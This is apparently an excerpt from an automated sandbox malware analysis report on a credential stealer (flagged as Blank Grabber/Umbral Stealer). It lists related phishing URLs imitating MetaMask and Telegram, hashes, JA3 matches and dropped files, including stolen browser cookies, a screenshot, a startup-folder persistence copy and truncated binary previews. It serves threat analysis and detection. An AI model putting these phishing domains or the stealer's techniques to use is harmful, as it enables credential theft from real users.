                                                                                                                                                                              https://heuristic-knuth-588d37.netlify.app/?naps/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 52.222.236.17
                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 76.223.111.18
                                                                                                                                                                              http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                              • 18.245.31.33
                                                                                                                                                                              https://nlfnx7.cc/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.167.226.170
                                                                                                                                                                              AMAZON-02UShttp://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://meittaammasskei-loogge.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 18.192.130.3
                                                                                                                                                                              http://matamask-usaklog.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://metamssk-luggiinn.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://metamaeskloegin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                              https://heuristic-knuth-588d37.netlify.app/?naps/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 52.222.236.17
                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 76.223.111.18
                                                                                                                                                                              http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                              • 18.245.31.33
                                                                                                                                                                              https://nlfnx7.cc/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.167.226.170
                                                                                                                                                                              CLOUDFLARENETUSBootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.219.181
                                                                                                                                                                              http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.21.56.69
                                                                                                                                                                              http://www.telegramstg.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.21.22.141
                                                                                                                                                                              http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.21.1.232
                                                                                                                                                                              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                              http://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.21.57.146
                                                                                                                                                                              http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 104.16.123.96
                                                                                                                                                                              http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 172.67.144.208
                                                                                                                                                                              https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              http://www.telegramdd.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 172.67.193.48
                                                                                                                                                                              TUT-ASUSF0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ec1.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://metamaeskloegin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://www.www-support-com.info/fmicode/code.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              https://telegrams-mh.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://www.fmilocation.help/fmicode/code.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              No context

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):236544
                                                                                                                                                                              Entropy (8bit):6.082686262892605
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4+Ocip3cw/oeHp0AVO0b8e1mMi:DoZtL+EP8+Ocip3cw/oeHp0AVji
                                                                                                                                                                              MD5:F70B5E56A09AF292D4E909C547F9C8C0
                                                                                                                                                                              SHA1:577883BDBE8DC9582E15E7A1212B1FE432BAFCE3
                                                                                                                                                                              SHA-256:8FD22C5ACB3144DBAA5AB3F9DD5901EB6F3BEEF67E72EA431246C6A790C067DE
                                                                                                                                                                              SHA-512:E54CCB56AA6473ABD3530493933D5164F2DFF02076E0F03443382F02D177A52E318D8D0F432E6A3FB5620EAFFD09F2DBF6CCBF9698BA149B149C594FA162D879
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, Author: Joe Security
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`....................................K.......P........................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MoonHub.exe.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1965
                                                                                                                                                                              Entropy (8bit):5.377802142292312
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                                                                              MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                                                                              SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                                                                              SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                                                                              SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\resembleC2.exe.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e...........................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):46080
                                                                                                                                                                              Entropy (8bit):5.780577504954653
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:c8vWwhHzlJbzOuumn30yUMsP4euzkTvObyRNwZAf8VYEqQr9w3NGuDgN:PlJbFo7ObIeCfCqQr9cGu8
                                                                                                                                                                              MD5:8C7D2F0A936DBE6D0899D40171FFB668
                                                                                                                                                                              SHA1:0B22FCD904F3B0FA2555A32A2635423668FC4616
                                                                                                                                                                              SHA-256:85F5F5ACB54C30EFD4F84C0F11C834B7DAB98C5BB7357BDDCD29FBE5BABC4DB6
                                                                                                                                                                              SHA-512:463A48EC2752FD002E82DFE555ABD03FC666A523DA99E0E848788EEFF6F98D06D36A360CFD7AD70D342BB4C90A49131A3428F1404D17E04A7FE5A1022C1FAA65
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a..f.........."...0.................. .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text...t.... ...................... ..`.rsrc...............................@..@........................................H.......Xj...`...... ...de...............................................W.......4...f.2..W.....H3......3.........(!...*J.($....o%...(....*6..(&...o....*"..o....*F($....(....o0...*2.o....(1...*".o.....*.sD........*.(%...-#(&...-.($...-.('...-.((...-.(*...,..(K...*.r[..p(j...sL...sM...(N...oO......*.r...p(j...sL...sM...(N...oO......*.s-........*.....*n.re..p(j...ry..p(j...(2...*b.{%....o<...(v....ow...*2~.....o....*...}+.....}*.....{*....8...}(.....})...*....C...s....s.....{(...(.....

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Ededb9DyVYxjXAQ.ligma

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):656460
                                                                                                                                                                              Entropy (8bit):7.998181014172452
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:12288:3aq9YUnlkphkJjLnAX/jc/ISC1MfvR6UEbkjlbPkxKtjNfZxSVbUtsnOjKnWSo+S:q219fnw/4/IpWIU6IbPkOfZxaiAZXojh
                                                                                                                                                                              MD5:6412D4CEC5064C94E1AC4BE2B0C24B79
                                                                                                                                                                              SHA1:5B2E97D870F725807025C814605DE2F0807B6577
                                                                                                                                                                              SHA-256:B7D93B3AA08B3568C7E6A3C5AD5A2102E1D2086CF3636703CB7F808713DFBFA4
                                                                                                                                                                              SHA-512:5AD6A0E3E1400BBEE32315894D633ED3B1DDC0C63893DA4AFFAE54DC66919D343478E97F7C7EAB3C0B875161AAA0CAB9A455FD022D8635B2B0F8FE4FB9BDE3FC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PK........`.,Z.*C.....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..!.]t.-.4..o`.....2|...w...;.S..o..R.7..........0!...T.S.#]'...q.*R...".b..(..Tg....C...'...[g*C{..}...]N...N]..nR..R;.!]3.H.&)..8..<..U......<.fJ...Q^U?s.q%.%-...4......3...g7..p..>..T....*..{.8JZ..k.e......|m...........PK........`.,Z..gE....K......Display\Display.pngd.{<.....m&$..tp.&JH..69Mr(...ByG.#m..C!b.....dH.L..Y9....y..|...s.}....n..k....x......6..}h7..".h.....{...w...Uc...^0?.P:..v~.ade......;...E_...../P.O.;.l..01.x.ivK ....:.r...w.`.?k...5..........P+.T.^d`!B.F.%....I..D....;'...3..P.to.g.|+.........Eo..Y.\;@M...0..]...y.=<%.i..x...O...&n...Lz.y.!.w2.(!Ji.j=.....J&..}...7.;..1uNF.x.+...!w..m..o............Z.;.e3.p~.m...9.u..g.K..._.f".m.t.....H_.....`N..&...5.0...s.eP.u.8PM]......._..f.~{...7|G.k...n...0v.....2W.G.=.+{.a%5. .....pE....u.h%g3.)...K...?j8.M=...U. .a....Qe.V..q.i....6S...rbk@..e!.Z7.>.S..<T-....|.}..N!.....m............O._...V..k.W.5,...J9..

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Ededb9DyVYxjXAQ\Browsers\Cookies\Chrome Cookies.txt

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                              Entropy (8bit):5.76524051718901
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                                                                                                                                                              MD5:B11F445211C21DB45D7B779A5C6E2444
                                                                                                                                                                              SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                                                                                                                                                              SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                                                                                                                                                              SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Ededb9DyVYxjXAQ\Display\Display.png

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):674763
                                                                                                                                                                              Entropy (8bit):7.922612762784588
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:wR3YXWAGGfaxAePF7BzD4ujV62R41jdbThXyPz+c+TAPUL3jI:w5DAxMFfJj9RqjfXy0Tb0
                                                                                                                                                                              MD5:6D87AD1484D58A350C0F5D2DA218F3D6
                                                                                                                                                                              SHA1:29D5AC0B2C5252FD275DC021F8E25910513B78C2
                                                                                                                                                                              SHA-256:D98898C1F8E7877E99B6C5C02C2ED23247320011E924CC0D3CD3191F5CA71928
                                                                                                                                                                              SHA-512:D24A8FD183330FD890D93CFAA3010D84D8285D46B1E3D4E7915155C1BDAD6E9386C2449E82E1DB8A6C95036626FA5297BB48E0B895B89D1DAA48FB8C142F3364
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....Wy...U....}...9....=.n...m.........s...Ad...d..6H...d!.m0...3.@[9l.....g....]...V..U{K....s~.7.ZU[.=......D.,.......1y.m}>..G.=zq.|)..%.M..s..........7!S....&.b..L.5C.s...g.*0Wl...q.~fat.|pAL........O.Q.oNL....J..|.....?.O.7..Czt?qo;...|..91.............b.Cw-...s.t...........y.m-..=M...Yt.s.P..-..9.}W>s.L...w.<>o.i^t...gsb...w?..t......-y.f:`..n.t.tC......M.{.q....e..1S...0...S..I.....B]..b...._.....6.^}...su.........R.W...sMZ...YL....+.,#1...s@..*..:..3..].:...tyZ....t.k.T.O..c.A9.Y..|V.k.....ZO...6...W....3^~i.~.%..bE...[~.e%..../.5...a.?w.K.....>......9../..-...3.?..*...rb..q.uy...c=....ua.=6.?...8,...|.|n...rn....=.hc...<../...^.b...|.....n.qz..}.<.0..y....-.a.>......R.|...........?.../...2j.......3w;......[.....v>.0..9yMM>s...W..M...)............!....6.9.|.|..Ag..q..y.N9.c.G....;+Mo.?7..N.'..V...9...;[....Y.:.Qb....Y..y

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MoonHub.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):236544
                                                                                                                                                                              Entropy (8bit):6.082686262892605
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4+Ocip3cw/oeHp0AVO0b8e1mMi:DoZtL+EP8+Ocip3cw/oeHp0AVji
                                                                                                                                                                              MD5:F70B5E56A09AF292D4E909C547F9C8C0
                                                                                                                                                                              SHA1:577883BDBE8DC9582E15E7A1212B1FE432BAFCE3
                                                                                                                                                                              SHA-256:8FD22C5ACB3144DBAA5AB3F9DD5901EB6F3BEEF67E72EA431246C6A790C067DE
                                                                                                                                                                              SHA-512:E54CCB56AA6473ABD3530493933D5164F2DFF02076E0F03443382F02D177A52E318D8D0F432E6A3FB5620EAFFD09F2DBF6CCBF9698BA149B149C594FA162D879
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`....................................K.......P........................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TwcbksbKdCICBYG

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00rv5t4z.pfi.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05wemvax.j2d.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
